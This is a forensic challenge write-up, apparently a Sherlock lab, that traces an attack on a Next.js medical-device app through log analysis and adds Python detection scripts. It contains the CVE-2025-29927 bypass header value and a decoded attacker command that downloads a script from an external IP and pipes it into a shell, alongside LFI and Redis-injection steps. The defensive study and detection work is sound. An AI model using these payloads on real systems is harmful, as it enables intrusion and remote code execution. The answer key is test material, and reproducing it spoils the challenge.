NeuroSync-D

CHALLENGE DESCRIPTION

NeuroSync™ is a leading suite of products focusing on developing cutting-edge medical BCI devices, designed by the Korosaki Corporation. Recently, an APT group targeted them and was able to infiltrate their infrastructure and is now moving laterally to compromise more systems. It appears that they have even managed to hijack a large number of online devices by exploiting an N-day vulnerability. Your task is to find out how they were able to compromise the infrastructure and understand how to secure it.

SOLUTION

What version of Next.js is the application using?

Search the artefacts for the framework name. -a treats any binary-looking file as text, and -10 prints ten lines of context around each match, which is enough to catch the version string:

grep -a10 -i 'next.js' *

Answer 15.1.0

What local port is the Next.js-based application running on?

Answer 3000

A critical Next.js vulnerability was released in March 2025, and this version appears to be affected. What is the CVE identifier for this vulnerability?

A web search for "CVE Next.js 2025" leads to the March 2025 advisory for the middleware authorization bypass.

Answer CVE-2025-29927

The attacker tried to enumerate some static files that are typically available in the Next.js framework, most likely to retrieve its version. What is the first file he could get?

Hint: Look for web requests with HTTP status 200.

We only need the earliest file, so we list the lines containing a 200 status and take the first few with head. Note that this pattern matches "200" anywhere in a line, so read the output rather than trusting the count:

grep -i '200' * | head

Answer main-app.js

Then the attacker appears to have found an endpoint that is potentially affected by the previously identified vulnerability. What is that endpoint?

The endpoint is visible in the same output: once the static-file enumeration stops, the requests target /api/bci/analytics.

Answer /api/bci/analytics

How many requests to this endpoint have resulted in an “Unauthorized” response?

Hint: Look for web requests with HTTP status 401.

List the lines with a 401 status and count those that target /api/bci/analytics:

grep -i '401' *

Answer 5

When is a successful response received from the vulnerable endpoint, meaning that the middleware has been bypassed?

The last failed (401) request is at 2025-04-01 11:38:04, so the first 200 response on the endpoint after that timestamp marks the bypass.

Answer 2025-04-01 11:38:05

Given the previous failed requests, what will most likely be the final value for the vulnerable header used to exploit the vulnerability and bypass the middleware?

Search for the header the attacker manipulated. The failed requests show the value growing by one "middleware" segment each time; the final, successful value repeats it five times, which is the recursion limit the vulnerable middleware check uses before it skips middleware entirely:

grep -i 'middleware' *

Answer x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
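As an added example (not code from the original write-up or from the Sherlock artefacts), the following Python script answers the log-analysis questions above in one pass and doubles as detection logic for the CVE-2025-29927 pattern: it reports the first static asset served, counts 401s on the endpoint, finds the first 200 whose x-middleware-subrequest header is deep enough to trigger the bypass, and flags every client-supplied copy of that header. The log layout, the regex and the sample lines are constructed; real Next.js or reverse-proxy logs need their own parser.

```python
# Added example for this write-up, not part of the original post or the
# Sherlock artefacts: triage of access-log entries for the CVE-2025-29927
# middleware-bypass pattern. The log layout and the sample lines below are
# constructed; real Next.js / reverse-proxy logs will need their own regex.
import re

# Constructed sample: static-file enumeration, five rejected probes with an
# escalating x-middleware-subrequest header, then the successful bypass.
SAMPLE_LOG = """\
2025-04-01 11:37:50 GET /_next/static/chunks/main-app.js 200
2025-04-01 11:37:51 GET /_next/static/chunks/app-pages-internals.js 200
2025-04-01 11:38:00 GET /api/bci/analytics 401
2025-04-01 11:38:01 GET /api/bci/analytics 401 x-middleware-subrequest: middleware
2025-04-01 11:38:02 GET /api/bci/analytics 401 x-middleware-subrequest: middleware:middleware
2025-04-01 11:38:03 GET /api/bci/analytics 401 x-middleware-subrequest: middleware:middleware:middleware
2025-04-01 11:38:04 GET /api/bci/analytics 401 x-middleware-subrequest: middleware:middleware:middleware:middleware
2025-04-01 11:38:05 GET /api/bci/analytics 200 x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
"""

# Assumed layout: "<timestamp> <method> <path> <status> [x-middleware-subrequest: <value>]"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<method>[A-Z]+) (?P<path>\S+) "
    r"(?P<status>\d{3})(?: x-middleware-subrequest: (?P<subreq>\S+))?$"
)

# Recursion limit used by the vulnerable middleware check: once the header
# lists the middleware name this many times, middleware is skipped entirely.
MAX_RECURSION_DEPTH = 5


def parse_log(text):
    """Parse log text into dicts; lines that do not match the layout are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            e = m.groupdict()
            e["status"] = int(e["status"])
            entries.append(e)
    return entries


def first_static_hit(entries):
    """Basename of the first Next.js static asset served with HTTP 200."""
    for e in entries:
        if e["status"] == 200 and e["path"].startswith("/_next/static/"):
            return e["path"].rsplit("/", 1)[-1]
    return None


def count_status(entries, path, status):
    """Number of responses with the given status for one path."""
    return sum(1 for e in entries if e["path"] == path and e["status"] == status)


def bypass_depth(value, middleware_name="middleware"):
    """How many colon-separated segments of the header equal the middleware name."""
    return sum(1 for seg in value.split(":") if seg == middleware_name)


def first_bypass(entries, path):
    """Timestamp and header value of the first 200 on `path` that carries a
    header deep enough to trigger the bypass, or None if there is none."""
    for e in entries:
        if (e["path"] == path and e["status"] == 200 and e["subreq"]
                and bypass_depth(e["subreq"]) >= MAX_RECURSION_DEPTH):
            return e["ts"], e["subreq"]
    return None


def flag_subrequest_header(entries):
    """Every request carrying x-middleware-subrequest. Next.js sets this header
    on its own internal sub-requests only, so any copy arriving from a client
    is worth an alert regardless of the response status."""
    return [(e["ts"], e["path"], e["status"], e["subreq"]) for e in entries if e["subreq"]]


if __name__ == "__main__":
    log = parse_log(SAMPLE_LOG)
    print("first static asset:", first_static_hit(log))
    print("401s on /api/bci/analytics:", count_status(log, "/api/bci/analytics", 401))
    print("bypass:", first_bypass(log, "/api/bci/analytics"))
    for hit in flag_subrequest_header(log):
        print("client-supplied subrequest header:", hit)
```

For detection the useful function is flag_subrequest_header: the bypass only succeeds at depth five, but the earlier, shallower probes are the same attacker warming up, so alerting on any externally supplied x-middleware-subrequest header catches the attempt before the 200.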

The attacker chained the vulnerability with an SSRF attack, which allowed them to perform an internal port scan and discover an internal API. On which port is the API accessible?

Search the logs for the port-scan activity:

grep -i 'port' *

Answer 4000

After the port scan, the attacker starts a brute-force attack to find some vulnerable endpoints in the previously identified API. Which vulnerable endpoint was found?

Answer /logs

When was the vulnerable endpoint first used maliciously?

Answer 2025-04-01 11:39:01

What is the attack name the endpoint is vulnerable to?

Answer Local File Inclusion

What is the name of the file that was targeted the last time the vulnerable endpoint was exploited?

Answer secret.key

Finally, the attacker uses the sensitive information obtained earlier to create a special command that allows them to perform Redis injection and gain RCE on the system. What is the command string?

The command uses a literal pipe as its field separator, so search for lines containing one (the pattern also matches any other line with a pipe character, so pick out the OS_EXEC line):

grep -i '|' *

Answer OS_EXEC|d2dldCBodHRwOi8vMTg1LjIwMi4yLjE0Ny9oNFBsbjQvcnVuLnNoIC1PLSB8IHNo|f1f0c1feadb5abc79e700cac7ac63cccf91e818ecf693ad7073e3a448fa13bbb

Once decoded, what is the command?

The middle field is Base64; decode it with base64 -d. The result is a download-and-execute one-liner that fetches a script and pipes it straight into a shell.

Answer wget http://185.202.2.147/h4Pln4/run.sh -O- | sh
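To make the decoding step above reusable for triage, here is an added Python example (not code from the original write-up): it splits the captured string into its three "|"-separated fields, Base64-decodes the payload, checks that the third field is shaped like a hex digest, and classifies the decoded command as download-and-execute when a fetch tool is piped into a shell. The three-field layout is read off the captured string; how the digest is derived from the leaked secret.key is not established here, so it is only validated for shape.

```python
# Added example for this write-up, not part of the original post: parse the
# three-field OS_EXEC string recovered from the logs and decode its payload.
# The "<action>|<base64 payload>|<hex digest>" layout is read off the captured
# string; how the digest is computed is not established here and is only
# checked for shape.
import base64
import binascii
import re

# Command string as captured in the challenge logs.
CAPTURED = ("OS_EXEC|d2dldCBodHRwOi8vMTg1LjIwMi4yLjE0Ny9oNFBsbjQvcnVuLnNoIC1PLSB8IHNo"
            "|f1f0c1feadb5abc79e700cac7ac63cccf91e818ecf693ad7073e3a448fa13bbb")

# Download-and-execute shape: a fetch tool whose output is piped into a shell.
DOWNLOAD_EXEC_RE = re.compile(r"\b(?:wget|curl)\b.*\|\s*(?:sh|bash|zsh)\b")


def parse_os_exec(raw):
    """Split the captured string, Base64-decode the payload and validate the digest's shape."""
    parts = raw.split("|")
    if len(parts) != 3:
        raise ValueError(f"expected 3 '|'-separated fields, got {len(parts)}")
    action, payload_b64, digest = parts
    try:
        command = base64.b64decode(payload_b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"payload is not valid Base64 text: {exc}") from exc
    if not re.fullmatch(r"[0-9a-f]+", digest):
        raise ValueError("digest field is not lowercase hex")
    return {"action": action, "command": command, "digest": digest,
            "digest_bits": len(digest) * 4}


def is_download_and_execute(command):
    """True when the decoded command fetches a remote file and pipes it to a shell."""
    return DOWNLOAD_EXEC_RE.search(command) is not None


def triage(raw):
    """Decode and classify one captured command string."""
    info = parse_os_exec(raw)
    info["remote_code_exec"] = (info["action"] == "OS_EXEC"
                                and is_download_and_execute(info["command"]))
    return info


if __name__ == "__main__":
    result = triage(CAPTURED)
    for key, value in result.items():
        print(f"{key}: {value}")
```

Running it on the captured string yields the same wget one-liner as base64 -d, flagged as remote code execution; feeding it a malformed string (wrong field count, invalid Base64, non-hex digest) raises a ValueError instead of silently producing garbage, which matters when the function is run over many log lines.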